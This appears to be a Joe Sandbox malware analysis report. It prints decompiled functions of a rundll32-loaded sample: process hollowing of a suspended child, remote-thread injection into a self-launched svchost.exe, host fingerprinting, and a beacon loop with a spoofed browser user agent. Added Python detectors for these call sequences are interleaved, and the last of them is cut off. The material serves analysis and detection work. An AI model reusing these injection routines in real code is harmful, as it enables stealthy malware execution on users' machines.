					// Ebx + 8 is PEB.ImageBaseAddress; the 4-byte write replaces it with _a12.
					_t17 = WriteProcessMemory(_a4, _v720.Ebx + 8,  &_a12, 4, 0); // executed
					if(_t17 != 0) {
						// _a16 becomes the entry point that ntdll's thread start routine
						// calls once the thread is resumed.
						_v720.Eax = _a16;
						_t19 = SetThreadContext(_a8,  &_v720); // executed
						if(_t19 != 0) {
							ResumeThread(_a8); // executed
							return 1;
						}
						return 0;
					}
					return 0;
				}
				return 0;
			}







                                                  APIs
                                                  • GetThreadContext.KERNEL32(00341ECF,00010002), ref: 00343814
                                                  • WriteProcessMemory.KERNELBASE(?,?,00500000,00000004,00000000), ref: 00343838
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
• Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
• Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
• Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ContextMemoryProcessThreadWrite
                                                  • String ID:
                                                  • API String ID: 2099319263-0
                                                  • Opcode ID: 986645319e92069ba7ff468ab9c3761ecc9cd9c622071ba54264c80e44fc7e2a
                                                  • Instruction ID: b0d0bae983fec01b42c8a2b0c496b6f51c1fe58b2b59b85b5ffc787356b10c9c
                                                  • Opcode Fuzzy Hash: 986645319e92069ba7ff468ab9c3761ecc9cd9c622071ba54264c80e44fc7e2a
                                                  • Instruction Fuzzy Hash: B1116175605109ABEB11CF64DC49FAEB3FCAB18744F108568FA09DB140EB30EA54CF60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
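Seen from a sandbox or ETW API trace, E00342B80 and E003437E0 together produce a fixed call order: a CREATE_SUSPENDED process creation, GetThreadContext with CONTEXT_INTEGER, a WriteProcessMemory into the child, SetThreadContext and ResumeThread. The following detector is an added example, not code from the sample or from Joe Sandbox: it walks per-process trace lines and reports each process that completes that sequence. The trace line format and every line in SAMPLE_TRACE are constructed for the demo (pid 5 mirrors the sample's sequence against a suspended explorer.exe, the process E00342DF0 looks for; pid 7 is an ordinary launch).

```python
"""Flag the suspended-create / GetThreadContext / WriteProcessMemory /
SetThreadContext / ResumeThread sequence that E00342B80 and E003437E0 perform,
in a per-process API-call trace. Added example, not code from the sample; the
trace format and every line in SAMPLE_TRACE are constructed for this demo."""
import re

CREATE_SUSPENDED = 0x00000004
CONTEXT_INTEGER = 0x00000002  # 0x10002 in the sample = CONTEXT_i386 | CONTEXT_INTEGER

# Constructed line shape: "<pid> <api>(<name>=<value>, ...) -> <return>"
LINE_RE = re.compile(r"^(?P<pid>\d+)\s+(?P<api>\w+)\((?P<args>[^)]*)\)\s*->\s*(?P<ret>\S+)$")
ARG_RE = re.compile(r"(\w+)=([^,]+)")


def as_int(value):
    """Parse 0x-prefixed or bare hex/decimal; non-numeric values count as 0."""
    if value is None:
        return 0
    for base in (0, 16):
        try:
            return int(value, base)
        except ValueError:
            pass
    return 0


def parse_line(line):
    """Return (pid, api, {arg: value}) or None for a line that does not parse."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    args = {k: v.strip() for k, v in ARG_RE.findall(m.group("args"))}
    return int(m.group("pid")), m.group("api"), args


# The stages must appear in this order for one source pid. Lines between stages
# are ignored. A debugger issues the same calls, so the discriminator is the
# CREATE_SUSPENDED child that is written to and re-pointed before it ever runs.
STAGES = (
    ("suspended create", lambda api, a: api.startswith("CreateProcess")
     and bool(as_int(a.get("dwCreationFlags")) & CREATE_SUSPENDED)),
    ("read context", lambda api, a: api == "GetThreadContext"
     and bool(as_int(a.get("ContextFlags")) & CONTEXT_INTEGER)),
    ("write child", lambda api, a: api == "WriteProcessMemory"),
    ("set context", lambda api, a: api == "SetThreadContext"),
    ("resume", lambda api, a: api == "ResumeThread"),
)


def find_hollowing(lines):
    """Return [(pid, target image)] for every pid that completes all stages."""
    progress = {}  # pid -> [stage index, target image]
    hits = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        pid, api, args = parsed
        state = progress.setdefault(pid, [0, None])
        _name, matches = STAGES[state[0]]
        if not matches(api, args):
            continue
        if state[0] == 0:
            state[1] = args.get("lpApplicationName") or args.get("lpCommandLine")
        state[0] += 1
        if state[0] == len(STAGES):
            hits.append((pid, state[1]))
            progress[pid] = [0, None]
    return hits


# Constructed trace, not taken from the report.
SAMPLE_TRACE = [
    r"5 CreateProcessA(lpApplicationName=C:\Windows\explorer.exe, dwCreationFlags=0x00000004) -> 1",
    r"5 GetThreadContext(hThread=0x1c4, ContextFlags=0x00010002) -> 1",
    r"5 WriteProcessMemory(hProcess=0x1c0, lpBaseAddress=0x7ffde008, nSize=0x4) -> 1",
    r"5 SetThreadContext(hThread=0x1c4) -> 1",
    r"5 ResumeThread(hThread=0x1c4) -> 1",
    r"5 GetProcessId(hProcess=0x1c0) -> 0x9c4",
    r"7 CreateProcessA(lpApplicationName=C:\Windows\notepad.exe, dwCreationFlags=0x0) -> 1",
    r"7 WriteProcessMemory(hProcess=0x2a0, lpBaseAddress=0x00400000, nSize=0x4) -> 1",
    r"7 ResumeThread(hThread=0x2a4) -> 0",
]

if __name__ == "__main__":
    for pid, target in find_hollowing(SAMPLE_TRACE):
        print(f"pid {pid}: hollowed {target}")
```

The stage predicates are deliberately loose on the WriteProcessMemory step: the sample's tell-tale write is only 4 bytes at PEB+8, but the payload itself has to be written by E00343270 as well, so matching any write into the suspended child keeps the rule robust to how the mapping is done.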

                                                  C-Code - Quality: 72%
                                                  			E00341C70(void* __eflags) {
                                                  				intOrPtr _v8;
                                                  				char _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				signed int _v32;
                                                  				char _v36;
                                                  				intOrPtr _v40;
                                                  				intOrPtr _v44;
                                                  				intOrPtr _t33;
                                                  				intOrPtr _t34;
                                                  				intOrPtr _t36;
                                                  				void* _t61;
                                                  				void* _t62;
                                                  
                                                  				asm("xorps xmm0, xmm0");
                                                  				asm("movlpd [ebp-0x18], xmm0");
                                                  				_v12 = 0x8000;
                                                  				_t33 = E00341390(_v12); // executed
                                                  				_t62 = _t61 + 4;
                                                  				_v16 = _t33;
                                                  				_v8 = _v16;
                                                  				_t34 = _v8;
                                                  				__imp__GetAdaptersAddresses(2, 0, 0, _t34,  &_v12); // executed
                                                  				_v20 = _t34;
                                                  				if(_v20 == 0) {
                                                  					while(_v8 != 0) {
                                                  						_t11 =  &_v36; // 0x342645
                                                  						E003414A0(_t11, 0, 8);
                                                  						_t15 =  &_v36; // 0x342645
                                                  						E00341450(_t15, _v8 + 0x2c,  *((intOrPtr*)(_v8 + 0x34)));
                                                  						_t62 = _t62 + 0x18;
                                                  						_t17 =  &_v36; // 0x342645
                                                  						_v28 = _v28 ^  *_t17;
                                                  						_v24 = _v24 ^ _v32;
                                                  						_v8 =  *((intOrPtr*)(_v8 + 8));
                                                  					}
                                                  				}
                                                  				E003413D0(_v16);
                                                  				_t36 = E00342490(); // executed
                                                  				_v44 = _t36;
                                                  				_v40 = 0;
                                                  				return E00341400(_v44, 0x20, _v40) ^ _v28;
                                                   			}

                                                   Instruction addresses: 0x00341c76, 0x00341c79, 0x00341c7e, 0x00341c89, 0x00341c8e, 0x00341c91, 0x00341c97, 0x00341c9e, 0x00341ca8, 0x00341cae, 0x00341cb5, 0x00341cb7, 0x00341cc1, 0x00341cc5, 0x00341cdb, 0x00341cdf, 0x00341ce4, 0x00341cea, 0x00341cf3, 0x00341cf6, 0x00341cff, 0x00341cff, 0x00341cb7, 0x00341d08, 0x00341d10, 0x00341d17, 0x00341d1a, 0x00341d33

                                                  APIs
                                                    • Part of subcall function 00341390: GetProcessHeap.KERNEL32(?,00341886,00100000), ref: 0034139C
                                                    • Part of subcall function 00341390: RtlAllocateHeap.NTDLL(004E0000,00000000,00341886,?,00341886,00100000), ref: 003413BD
                                                  • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,00008000), ref: 00341CA8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                   • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AdaptersAddressesAllocateProcess
                                                  • String ID: E&4$Mj<p
                                                  • API String ID: 2964925633-206575084
                                                  • Opcode ID: 39d03d8f16274d053992d4817779c580933d78844dea88f0b740e6db08b62e90
                                                  • Instruction ID: c2f947a769767725f8e2e9e20db7fcd7d3afb9233aee0f60ee50e8dc8b84b742
                                                  • Opcode Fuzzy Hash: 39d03d8f16274d053992d4817779c580933d78844dea88f0b740e6db08b62e90
                                                  • Instruction Fuzzy Hash: F821FBB5D00209ABDB04DFE5D982BEEBBF5BF4C304F104159E905BB341E6706A84CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 83%
                                                  			E00342E90(CHAR* _a4) {
                                                  				signed int _v8;
                                                  				unsigned int _v12;
                                                  				unsigned int _v16;
                                                  				char _v276;
                                                  				char _v4372;
                                                  				signed int _t23;
                                                  				void* _t26;
                                                  				int _t29;
                                                  				void* _t40;
                                                  				void* _t41;
                                                  
                                                  				E00341420(0x1110);
                                                  				_t23 =  &_v12;
                                                  				_push(_t23);
                                                  				_push(0x1000);
                                                  				_push( &_v4372); // executed
                                                  				L00343BDD(); // executed
                                                  				if(_t23 != 0) {
                                                  					_v16 = _v12 >> 2;
                                                  					_v8 = 0;
                                                  					while(_v8 < _v16) {
                                                  						_t26 = E00342F30( *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110)),  &_v276); // executed
                                                  						_t41 = _t41 + 8;
                                                  						if(_t26 == 0) {
                                                  							L8:
                                                  							_t23 = _v8 + 1;
                                                  							_v8 = _t23;
                                                  							continue;
                                                  						}
                                                  						_t29 = lstrcmpiA( &_v276, _a4); // executed
                                                  						if(_t29 != 0) {
                                                  							goto L8;
                                                  						}
                                                  						return  *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110));
                                                  					}
                                                  					return _t23 | 0xffffffff;
                                                  				}
                                                  				return _t23 | 0xffffffff;
                                                   			}

                                                   Instruction addresses: 0x00342e98, 0x00342e9d, 0x00342ea0, 0x00342ea1, 0x00342eac, 0x00342ead, 0x00342eb4, 0x00342ec1, 0x00342ec4, 0x00342ed6, 0x00342ef0, 0x00342ef5, 0x00342efa, 0x00342f1d, 0x00342ed0, 0x00342ed3, 0x00000000, 0x00342ed3, 0x00342f07, 0x00342f0f, 0x00000000, 0x00000000, 0x00000000, 0x00342f14, 0x00000000, 0x00342f1f, 0x00000000

                                                  APIs
                                                  • K32EnumProcesses.KERNEL32(?,00001000,00342E03), ref: 00342EAD
                                                  • lstrcmpi.KERNEL32(?,00342E03,?,?,00342E03), ref: 00342F07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                   • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EnumProcesseslstrcmpi
                                                  • String ID: .>ov
                                                  • API String ID: 1246086236-341798122
                                                  • Opcode ID: 48c58026700e90da35ae5bc2acfccc5979777038dcb11cf0d149490fec32d845
                                                  • Instruction ID: 6aede821755dd8248d97eefc7a2b5a23330ebd0656fd4246730577fa3f90a5f9
                                                  • Opcode Fuzzy Hash: 48c58026700e90da35ae5bc2acfccc5979777038dcb11cf0d149490fec32d845
                                                  • Instruction Fuzzy Hash: 7D115E70D10108EBCB16CF94D841AEEB3F8BF48344F904699FA25AB280E770BE84DB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E003424F0() {
                                                  				void* _t1;
                                                  				void* _t2;
                                                  
                                                  				if( *0x347270 == 0) {
                                                  					_t2 = InternetOpenA("Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko", 0, 0, 0, 0); // executed
                                                  					 *0x347270 = _t2;
                                                  				}
                                                  				_t1 =  *0x347270; // 0xcc0004
                                                  				return _t1;
                                                   			}

                                                   Instruction addresses: 0x003424fa, 0x00342509, 0x0034250f, 0x0034250f, 0x00342514, 0x0034251a

                                                  APIs
                                                  • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 00342509
                                                  Strings
                                                  • Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko, xrefs: 00342504
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                   • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: InternetOpen
                                                  • String ID: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  • API String ID: 2038078732-3333256863
                                                  • Opcode ID: b37671659e40dd79d3900090ae7edc457e872edc5f19f8e91bc948d08c1cba1a
                                                  • Instruction ID: 980a53fe87b5513944cb65ce08002127789f40ff1ef5e69625c357952baf2b64
                                                  • Opcode Fuzzy Hash: b37671659e40dd79d3900090ae7edc457e872edc5f19f8e91bc948d08c1cba1a
                                                  • Instruction Fuzzy Hash: D2D01238684B04ABEB328BA4AD06F9173FCB346B14F610821F3086E1E0CFF07459C659
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00342490() {
                                                  				int _v8;
                                                  				long _v12;
                                                  				char _v272;
                                                  				int _t13;
                                                  				void* _t18;
                                                  
                                                  				_v8 = GetWindowsDirectoryA( &_v272, 0x104);
                                                  				if(_v8 == 0) {
                                                  					L3:
                                                  					return 0;
                                                  				}
                                                  				 *((char*)(_t18 + 0xfffffffffffffef7)) = 0;
                                                  				_t13 = GetVolumeInformationA( &_v272, 0, 0,  &_v12, 0, 0, 0, 0); // executed
                                                  				if(_t13 == 0) {
                                                  					goto L3;
                                                  				}
                                                  				return _v12;
                                                   			}

                                                   Instruction addresses: 0x003424ab, 0x003424b2, 0x003424ea, 0x00000000, 0x003424ea, 0x003424bc, 0x003424db, 0x003424e3, 0x00000000, 0x00000000, 0x00000000

                                                  APIs
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003424A5
                                                  • GetVolumeInformationA.KERNEL32 ref: 003424DB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                   • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DirectoryInformationVolumeWindows
                                                  • String ID:
                                                  • API String ID: 3487004747-0
                                                  • Opcode ID: 9e362a1582548df2d40ba2b057a4271798b9627ea95a282cb32e3d2a564e83b1
                                                  • Instruction ID: 130708db4ce018dc65e7fe28149d2e6481a748d656ca07c5cec392ac1937615b
                                                  • Opcode Fuzzy Hash: 9e362a1582548df2d40ba2b057a4271798b9627ea95a282cb32e3d2a564e83b1
                                                  • Instruction Fuzzy Hash: 51F05434A40308AAE735DB64DC15BD9B7ACD701700F5041A4B645EA1C0DBF47A84CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,0034BF13,00000001,?,0036D2FC,00000000,?,?,?,0036B0A8,0036D2FC), ref: 00351C31
                                                  • HeapDestroy.KERNEL32(?,0036D2FC,00000000,?,?,?,0036B0A8,0036D2FC), ref: 00351C67
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348568952.000000000034A000.00000020.00020000.sdmp, Offset: 0034A000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_34a000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$CreateDestroy
                                                  • String ID:
                                                  • API String ID: 3296620671-0
                                                  • Opcode ID: 9f991b191f234ab60ec9935b0de80769faccf94128bed65503d3ed9ebffa9488
                                                  • Instruction ID: 98f2b391cdf6d70962599caf41fc3543b8d94e093a8393dd4eed1a4dd81d2ea4
                                                  • Opcode Fuzzy Hash: 9f991b191f234ab60ec9935b0de80769faccf94128bed65503d3ed9ebffa9488
                                                  • Instruction Fuzzy Hash: 34E06DB1A94312EAEB175B30AE0DB2637E8A740387F00842AF841C91B0FBB48548AE00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 82%
                                                  			E00341870(void* __eflags) {
                                                  				intOrPtr _v8;
                                                  				long _v12;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				intOrPtr _v24;
                                                  				char _v28;
                                                  				intOrPtr _v32;
                                                  				char _v36;
                                                  				intOrPtr _t28;
                                                  				intOrPtr _t29;
                                                  				intOrPtr _t30;
                                                  				void* _t32;
                                                  				intOrPtr _t35;
                                                  				void* _t38;
                                                  				void* _t40;
                                                  				void* _t52;
                                                  				void* _t55;
                                                  
                                                  				_v12 = 0x100000;
                                                  				_t28 = E00341390(_v12); // executed
                                                  				_v20 = _t28;
                                                  				_t29 = E00341390(_v12); // executed
                                                  				_v24 = _t29;
                                                  				_t30 = E00341390(0x1000); // executed
                                                  				_t55 = _t52 + 0xc;
                                                  				_v8 = _t30;
                                                  				_v32 = 1;
                                                  				while(1) {
                                                  					_t58 = _v32 - 1;
                                                  					if(_v32 != 1) {
                                                  						break;
                                                  					}
                                                  					_t32 = E00341AA0( &_v36, _t58, _v20, _v12,  &_v36); // executed
                                                  					_t55 = _t55 + 0xc;
                                                  					if(_t32 != 1) {
                                                  						L12:
                                                  						Sleep(0xea60); // executed
                                                  						_t30 = E003415C0();
                                                  						Sleep(0xea60);
                                                  						continue;
                                                  					}
                                                  					_t35 = E00341560(_v20 + 4, _v24);
                                                  					_t55 = _t55 + 8;
                                                  					_v36 = _t35;
                                                  					_v16 = _v24;
                                                  					while(1 != 0) {
                                                  						_v16 = E003417B0(_v16, _v16, _v8);
                                                  						_t38 = E003427B0(_v16, _v8);
                                                  						_t55 = _t55 + 0xc;
                                                  						if(_t38 == 1) {
                                                  							_v28 = 0;
                                                  							_t46 = _v8;
                                                  							_t40 = E00341630(_v8, _v8,  &_v28); // executed
                                                  							_t55 = _t55 + 8;
                                                  							if(_t40 == 1 && _v28 == 0) {
                                                  								E003414E0(_t46, _v8);
                                                  								_t55 = _t55 + 4;
                                                  							}
                                                  						}
                                                  						if(_v16 != 0) {
                                                  							continue;
                                                  						} else {
                                                  							goto L12;
                                                  						}
                                                  					}
                                                  					goto L12;
                                                  				}
                                                  				return _t30;
                                                   			}

                                                   Instruction addresses: 0x00341876, 0x00341881, 0x00341889, 0x00341890, 0x00341898, 0x003418a0, 0x003418a5, 0x003418a8, 0x003418ab, 0x003418b2, 0x003418b2, 0x003418b6, 0x00000000, 0x00000000, 0x003418c8, 0x003418cd, 0x003418d3, 0x0034195a, 0x0034195f, 0x00341965, 0x0034196f, 0x00000000, 0x0034196f, 0x003418e4, 0x003418e9, 0x003418ec, 0x003418f2, 0x003418f5, 0x0034190e, 0x00341915, 0x0034191a, 0x00341920, 0x00341922, 0x0034192d, 0x00341931, 0x00341936, 0x0034193c, 0x00341948, 0x0034194d, 0x0034194d, 0x0034193c, 0x00341954, 0x00000000, 0x00341956, 0x00000000, 0x00341956, 0x00341954, 0x00000000, 0x003418f5, 0x0034197d

                                                  APIs
                                                    • Part of subcall function 00341390: GetProcessHeap.KERNEL32(?,00341886,00100000), ref: 0034139C
                                                    • Part of subcall function 00341390: RtlAllocateHeap.NTDLL(004E0000,00000000,00341886,?,00341886,00100000), ref: 003413BD
                                                    • Part of subcall function 00341AA0: GetVersion.KERNEL32(?,003418CD,?,00100000,?), ref: 00341AAD
                                                    • Part of subcall function 00341AA0: wsprintfA.USER32 ref: 00341B5E
                                                  • Sleep.KERNELBASE(0000EA60), ref: 0034195F
                                                  • Sleep.KERNEL32(0000EA60), ref: 0034196F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                   • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: HeapSleep$AllocateProcessVersionwsprintf
                                                  • String ID:
                                                  • API String ID: 1739176888-0
                                                  • Opcode ID: 4eea1954665144cf9772b4886e0889e093941126fcb3dc5ababea3d725d3a8ae
                                                  • Instruction ID: 1f761668352854c31781814a2fe1c318eeb742a595d271229a22df988b190733
                                                  • Opcode Fuzzy Hash: 4eea1954665144cf9772b4886e0889e093941126fcb3dc5ababea3d725d3a8ae
                                                  • Instruction Fuzzy Hash: A23193B6D00609EBDF11DFD4D851BAEB7F8AF48304F144428E519BE241E735BA848B92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E003413D0(void* _a4) {
                                                  				void* _t2;
                                                  				int _t4;
                                                  				void* _t5;
                                                  
                                                  				if( *0x34715c != 0) {
                                                  					_t5 =  *0x34715c; // 0x4e0000
                                                  					_t4 = HeapFree(_t5, 0, _a4); // executed
                                                  					return _t4;
                                                  				}
                                                  				return _t2;
                                                   			}

                                                  APIs
                                                  • HeapFree.KERNEL32(004E0000,00000000,00341D0D), ref: 003413E9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                   • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 0f738a6f7c31cbabb9cbd4129a45be7a32f1694c722a73322d9c812d93289042
                                                  • Instruction ID: c81aaa15bbae847f41e10ea771c7c2229398db9f520c9a546ec328fb2d1ec804
                                                  • Opcode Fuzzy Hash: 0f738a6f7c31cbabb9cbd4129a45be7a32f1694c722a73322d9c812d93289042
                                                  • Instruction Fuzzy Hash: DDC0123A104B48ABD22A9F85EC48BAA33EDA306341F004014B6084E7A0CBB5B898CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  C-Code - Quality: 87%
                                                  			E00343880(void* _a4, long _a8, intOrPtr _a12, intOrPtr _a16) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				void* _v16;
                                                  				void* _v20;
                                                  				void* _v24;
                                                  				void* _v28;
                                                  				char _v32;
                                                  				long _v36;
                                                  
                                                  				if(_a12 == 0) {
                                                  					_v8 = VirtualAlloc(0, _a8, 0x3000, 0x40);
                                                  					if(_v8 == 0) {
                                                  						L14:
                                                  						return 0;
                                                  					}
                                                  					E00341450(_v8, _a4, _a8);
                                                  					if(_a16 == 0) {
                                                  						_v28 = _v8;
                                                  						_v28();
                                                  						return 1;
                                                  					}
                                                  					_v24 = CreateThread(0, 0, E003439E0, _v8, 0, 0);
                                                  					if(_v24 == 0) {
                                                  						goto L14;
                                                  					}
                                                  					CloseHandle(_v24);
                                                  					return 1;
                                                  				}
                                                  				if(E00342C40( &_v16,  &_v32) != 0) {
                                                  					_v12 = VirtualAllocEx(_v16, 0, _a8, 0x3000, 0x40);
                                                  					if(_v12 == 0 || WriteProcessMemory(_v16, _v12, _a4, _a8, 0) == 0) {
                                                  						L7:
                                                  						goto L14;
                                                  					} else {
                                                  						_v20 = CreateRemoteThread(_v16, 0, 0, _v12, 0, 0,  &_v36);
                                                  						if(_v20 == 0) {
                                                  							goto L7;
                                                  						}
                                                  						CloseHandle(_v20);
                                                  						return 1;
                                                  					}
                                                  				}
                                                  				return 0;
                                                   			}

                                                  APIs
                                                  • VirtualAllocEx.KERNEL32(00500000,00000000,00500000,00003000,00000040,?,?,?,?,?,00341FB7), ref: 003438BC
                                                  • WriteProcessMemory.KERNEL32(00500000,00000000,00000000,00500000,00000000,?,?,?,?,?,00341FB7), ref: 003438DD
                                                  • CreateRemoteThread.KERNEL32(00500000,00000000,00000000,00000000,00000000,00000000,?), ref: 003438FB
                                                  • CloseHandle.KERNEL32(00000000), ref: 0034390E
                                                  • VirtualAlloc.KERNEL32(00000000,00500000,00003000,00000040,?,?,?,00341FB7), ref: 0034392A
                                                  • CreateThread.KERNEL32(00000000,00000000,003439E0,00000000,00000000,00000000), ref: 00343964
                                                  • CloseHandle.KERNEL32(00000000), ref: 00343977
                                                    • Part of subcall function 00342C40: GetEnvironmentVariableA.KERNEL32(SystemRoot,?,00000104), ref: 00342C71
                                                    • Part of subcall function 00342C40: lstrcatA.KERNEL32(?,\System32\svchost.exe), ref: 00342C83
                                                    • Part of subcall function 00342C40: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000424,00000000,00000000,00000044,?), ref: 00342CA9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                   • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                   • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$AllocCloseHandleProcessThreadVirtual$EnvironmentMemoryRemoteVariableWritelstrcat
                                                  • String ID:
                                                  • API String ID: 2742758278-0
                                                  • Opcode ID: 8b02201f2cb4a1aeda9aafd120f8dabe7269c3427950c71fa9c9f01156f0d178
                                                  • Instruction ID: b760d1ef50233d51b48b99b4ceacf8965e5fb647eb573a11055212c1da94c0ca
                                                  • Opcode Fuzzy Hash: 8b02201f2cb4a1aeda9aafd120f8dabe7269c3427950c71fa9c9f01156f0d178
                                                  • Instruction Fuzzy Hash: 16311E79A44208FBEB15DFA4DC49FAEB7B8AB48701F104518F605AF2C0D7B5AB40CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
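
The function above (with its subcall at 00342C40) launches %SystemRoot%\System32\svchost.exe itself and then uses VirtualAllocEx, WriteProcessMemory and CreateRemoteThread against that child. The following is an added detection example, not code from the sample or from the sandbox report: a small correlation over process-create and CreateRemoteThread events (Sysmon event IDs 1 and 8) that flags an svchost.exe started by something other than the Service Control Manager, and a remote thread created in an svchost.exe by the very process that spawned it. The event records are constructed to resemble the report's process chain (Office, rundll32.exe, svchost.exe); the field names, PIDs and paths are this example's assumptions.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Added example, not code from the sample or the sandbox report: correlation
# logic for the injection pattern in E00343880/E00342C40, i.e. a process that
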